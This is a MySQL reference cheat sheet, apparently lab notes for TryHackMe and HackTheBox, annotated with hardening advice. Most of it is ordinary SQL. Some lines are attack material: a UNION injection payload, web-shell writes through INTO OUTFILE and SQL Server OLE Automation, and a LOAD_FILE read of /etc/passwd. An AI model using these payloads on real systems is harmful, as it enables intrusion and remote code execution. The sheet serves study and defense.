MySQL

MySQL default system schemas/databases:

  • mysql - is the system database that contains tables that store information required by the MySQL server

  • information_schema - provides access to database metadata

  • performance_schema - is a feature for monitoring MySQL Server execution at a low level

  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

# Interactive connection: -p with no value makes the client prompt for the
# password, so it never lands in shell history or the process list.
mysql -h 10.10.97.109 -u root -p

# Same connection with the password inline (no space after -p). Handy in a
# lab, but the value is visible in shell history and in `ps` output; the
# client itself prints a warning about this.
mysql -h 10.10.97.109 -u root -pPassword123
show databases;   # typed inside the mysql client once connected

TryHackMe - Network Services 2

mysql -u root -p
  • Use this form when you already have a shell on the target host

# Lists every privilege granted to the account (see the linked SHOW GRANTS
# reference). Worth running for application accounts: FILE, SUPER or a global
# ALL are rarely needed there and widen the blast radius of an injection.
SHOW GRANTS FOR 'u1'@'localhost';

https://dev.mysql.com/doc/refman/8.0/en/show-grants.html
# Remote connection to an explicit host/port; -p with no value prompts for the
# password instead of exposing it on the command line.
mysql -u root -h docker.hackthebox.eu -P 3306 -p 
# Enumerates the databases visible to the connected account (only schemas the
# account has some privilege on are listed).
show databases;
# Placeholder for the database name. In MySQL, double quotes delimit string
# literals unless the ANSI_QUOTES SQL mode is on, so a real name goes bare or
# in backticks: use `database name`;
use "database name";

show tables;
# Dumps every column of every row; on a large table add a LIMIT first.
SELECT * FROM table_name;

# Column names, types and nullability (DESCRIBE is a MySQL shortcut for
# SHOW COLUMNS).
Describe table_name;
# Positional INSERT: relies on the table's column order, so it breaks silently
# when a column is added. The plaintext password is acceptable for a lab
# fixture only; a real schema stores a salted hash, never the password itself.
INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');

# Explicit column list, several rows in one statement; omitted columns take
# their defaults (id is presumably AUTO_INCREMENT here -- TODO confirm).
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');

# Irreversible: removes the table and all of its rows.
DROP TABLE logins;

# Schema changes. RENAME COLUMN needs MySQL 8.0+ (older servers use CHANGE);
# MODIFY re-types the column and can fail or truncate when existing values do
# not convert.
ALTER TABLE logins ADD newColumn INT;

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;

ALTER TABLE logins MODIFY oldColumn DATE;

ALTER TABLE logins DROP oldColumn;

# Bulk update scoped by WHERE (an UPDATE without one rewrites every row).
UPDATE logins SET password = 'change_password' WHERE id > 1;
# Sorting on the password column is fine for a demo, but note it is ordering
# plaintext secrets; in real data this column would hold a hash.
SELECT * FROM logins ORDER BY password;

SELECT * FROM logins ORDER BY password DESC;

# A secondary sort key breaks ties deterministically.
SELECT * FROM logins ORDER BY password DESC, id ASC;

# First two rows; without ORDER BY which two rows you get is not guaranteed.
SELECT * FROM logins LIMIT 2;

# MySQL-specific "LIMIT offset, count": skips 1 row and returns the next 2
# (equivalent to LIMIT 2 OFFSET 1).
SELECT * FROM logins LIMIT 1, 2;

SELECT * FROM logins WHERE id > 1;

# Lowercase keywords behave the same; whether 'admin' also matches 'Admin'
# depends on the column collation (the usual *_ci collations are
# case-insensitive).
SELECT * FROM logins where username = 'admin';

# % matches any run of characters; a prefix pattern like this can still use an
# index, a leading % cannot.
SELECT * FROM logins WHERE username LIKE 'admin%';

# _ matches exactly one character, so this returns usernames of length 3.
SELECT * FROM logins WHERE username like '___';

# The date is compared against a string literal; MySQL coerces it, but an
# explicit DATE '1990-01-01' is clearer and portable.
select first_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';
# Boolean demos: MySQL evaluates TRUE as 1 and FALSE as 0. The "= n" lines
# below are the returned results, not SQL.
SELECT 1 = 1 AND 'test' = 'test';
= 1

SELECT 1 = 1 AND 'test' = 'abc';
= 0 

SELECT 1 = 1 OR 'test' = 'abc';
= 1

SELECT 1 = 2 OR 'test' = 'abc';
= 0 

SELECT NOT 1 = 1;
= 0 

SELECT NOT 1 = 2;
= 1

# && and || are MySQL synonyms for AND / OR (deprecated as such in MySQL 8.0).
# With the PIPES_AS_CONCAT SQL mode enabled, || is string concatenation
# instead, so the || result below is not portable.
SELECT 1 = 1 && 'test' = 'abc';
= 0

SELECT 1 = 1 || 'test' = 'abc';
= 1

# != is a MySQL alias for the standard <> operator.
SELECT 1 != 1;
= 0

SELECT * FROM logins WHERE username != 'john';

# NOTE: a NULL username compares UNKNOWN on either side of !=, so rows with a
# NULL username are silently excluded by these two queries (three-valued
# logic).
SELECT * FROM logins WHERE username != 'john' AND id > 1;
# This will return the table users from my_database (schema-qualified name,
# so no USE is needed)
SELECT * FROM my_database.users;

# This will return database names from the database metadata; only schemas the
# account has some privilege on are listed, so a least-privilege application
# account reveals far less here than root does
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

# The same metadata query as it appears inside a UNION-based injection (the
# 1,3,4 pad the column count, "-- -" comments out the rest of the original
# query). The durable fix on the application side is parameterized queries,
# not input filtering.
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
# secure_file_priv gates INTO OUTFILE / LOAD_FILE: a directory restricts them
# to that path, an empty value means no restriction, and NULL disables them
# entirely (the hardened setting).
SHOW VARIABLES LIKE 'secure_file_priv';

# Same value via the metadata tables. information_schema.global_variables was
# removed in MySQL 8.0; use performance_schema.global_variables there. The
# statement is also missing its trailing semicolon.
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

# INTO OUTFILE writes the result set to a file on the *server*. It needs the
# FILE privilege, a secure_file_priv that allows the path, and an mysqld OS
# user that can write there; it refuses to overwrite an existing file, so the
# second statement fails once the first has created /tmp/test.txt.
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
SELECT * from users INTO OUTFILE '/tmp/test.txt';
> linux = cat /tmp/test.txt 
> linux = ls -la /tmp/test.txt (Will be owned by mysql)
# Will create a php shell exec in www directory. Only possible when the three
# conditions above hold for the web root. Hardening: do not grant FILE to
# application accounts, set secure_file_priv to NULL or a dedicated directory,
# and keep the web root unwritable by the mysql OS user. For IR, a file owned
# by the mysql user under the web root is a strong indicator.
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
# OLE Automation Procedures
-- SQL Server, not MySQL: these are sqlcmd transcripts ("1>" is the prompt).
-- Ole Automation Procedures is off by default; changing it requires the
-- ALTER SETTINGS permission (sysadmin/serveradmin) and "show advanced options"
-- must be enabled first. The new value is visible in sys.configurations, so
-- alerting on sp_configure / RECONFIGURE from application logins is a cheap
-- detection.
# Enabling the OLE
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO

# Creating a file
-- sp_OACreate / sp_OAMethod default to sysadmin-only execute permission and
-- run as the SQL Server service account, so the file lands wherever that
-- account can write. Hardening: leave the option off and keep the service
-- account from writing to the web root.
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO
# It will read the /etc/passwd. LOAD_FILE is the read-side counterpart of
# INTO OUTFILE: same FILE privilege and secure_file_priv gate, the file must be
# readable by the mysqld OS user and smaller than max_allowed_packet, and it
# returns NULL (not an error) when any of that fails. The same hardening
# applies: no FILE for application accounts, secure_file_priv set to NULL or a
# dedicated directory.
select LOAD_FILE("/etc/passwd");
